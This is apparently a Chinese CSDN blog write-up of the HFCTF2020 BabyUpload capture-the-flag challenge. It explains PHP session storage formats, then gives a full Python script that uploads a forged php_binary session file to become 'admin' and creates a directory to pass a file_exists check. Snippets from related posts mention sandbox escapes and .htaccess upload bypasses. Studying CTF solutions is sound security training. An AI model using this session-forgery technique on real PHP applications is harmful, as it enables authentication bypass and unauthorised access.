[HFCTF2020]BabyUpload

最新推荐文章于 2024-05-11 08:31:42 发布
最新推荐文章于 2024-05-11 08:31:42 发布
阅读量928 收藏 1
点赞数 1
分类专栏: 漏洞整理 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/125117042
版权

考点:通过上传session文件伪造session。

知识点1:

对于通过文件存储session的,不同的引擎存储方式有以下几种

php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值

知识点2:

file_exists() :检查文件或目录是香存在

当传入的路径为目录时函数返回值也为True

做题:

一道代码审计题

满足以下两个条件即可得到flag:
1.$_session['username'] === 'admin'
2.存在/var/babyctf/success.txt文件或者目录

这里有一个上传文件的功能,过滤了文件存储路径中的../和..\\,应该是防止目录穿越的,不过跟解题没有关系。 上传后的文件名在末尾加上了文件内容的哈希值,这个文件重命名也没什么用,我们可以自己计算哈希,并不影响我们知道重命名后的文件名。因此这段代码的功能就是可以在var/babyctf/下传任意文件。

这里是一个普通的读取文件的功能,可以读取var/babyctf/下任意文件。

解题思路:

1.利用文件读取功能读取session文件,判断session的存储方式。

session文件的默认文件名为sess+sessin_id

可以判断是通过php_binary方式存储,因此后面构造session也要以php_binary方式。

2.生成session文件并上传。

3.任意上传一个文件到/var/babyctf/success.txt/,目的是为了创建success.txt目录,依次通过file_exists的判断。

4.通过session_id再次访问页面得到flag,session_id为我们上传的session文件被重命名后的文件名的下划线后面的部分,即session文件内容的sha256哈希摘要。

直接给出flag获取脚本:

import hashlib
from io import BytesIO
import requests

url = 'http://5acc7c53-8abb-48ad-a93b-f529caffa7de.node4.buuoj.cn:81/index.php'
# 第一步:上传伪造的session文件
files = {"up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))}
data = {
    'direction':'upload',
    'attr':''
}
res = requests.post(url, data=data ,files=files)

# 第二步:获取后面请求时的session_id
session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()

# 第三步:在/var/babyctf/下创建success.txt目录
data1 = {
    'attr': 'success.txt',
    'direction': 'upload'
}
res1 = requests.post(url=url, data=data1, files=files)

# 第四步:通过上面获取的session_id发起请求,获取flag
cookie = {
    'PHPSESSID':session_id
}
flag_res = requests.post(url,cookies = cookie)
print(flag_res.text)

 

 

nigo134
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
---已搬运----BUUCTF:[HFCTF2020]BabyUpload sess_ file_exist()可 检测 目录和文件 。 sha256加密, PHP代码审计
Zero_Adam的博客
04-08 469
目录:一、自己做:1. 本地先试一试1. direction = upload & attr != private2. direction == upload & attr ==private3.direction=download & attr = (private)已经存在的 & filename =必须是完整文件名4.direction=download & attr = (not-private)已经存在的 & filename =必须是完整文件名2.
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 473
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 999
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
buuxtf [HFCTF2020]BabyUpload
qq_52671379的博客
04-09 1090
buuxtf [HFCTF2020]BabyUpload
[HFCTF2020]BabyUpload 1
读书 买花 长大
02-01 444
[HFCTF2020]BabyUpload 1
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1087
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
[HFCTF2020]BabyUpload session解析引擎
qq_54929891的博客
07-05 1163
对于代码的解析如上,获取flag的途径:1、session中的username参数要为admin2、在 /var/babyctf/success.txt存在在代码审查中可以得到的信息点: 在php中,session文件默认的存储文件名是sess_PHPSESSID,于是我们可以利用donwnload先看一下原先的session文件里面有什么,经过分析可以知道$attr参数我们可以暂时设置为空,因为目前感觉跟我们的操作没多大关系 可以发现有一个不可见字符,不同的php引擎,session的存储方式不一
[刷题记录][HFCTF2020]BabyUpload
qq_69209270的博客
09-27 94
漏了一个关键的点,session存储在和要求的success文件在同一个目录下,而且session的默认存储方式就是sess_PHPSESSID,我们直接利用download读取它,进行伪造。第一个很好弄,猜测就是可以传入cookie什么的,但是第二个该路径中要含有success.txt,既然题目要求,那就不可能有这个文件,所以要由我们自己创建。题目运用session伪造和文件上传,将原来的session修改为admin,上传success.txt,使得服务器满足所有条件,从而获得flag。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 686
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
buu刷题(4)
qq_62046696的博客
03-22 511
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
刷题(第三周)
qq_62046696的博客
03-11 711
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
BUU__Web 分类练习文档
风过江南乱的博客
08-18 914
前言 这是赵总总结分类的,我只是搬一下,保存一下,原链接 赵总博客 分类 1、代码审计以及反序列化 https://buuoj.cn/challenges#BUU%20CODE%20REVIEW%201 https://buuoj.cn/challenges#[HCTF%202018]WarmUp https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP https://buuoj.cn/
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1457
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 748
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
为什么Redis6.0引入了多线程
最新发布
IT深耕十余载,大道之简
05-11 333
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值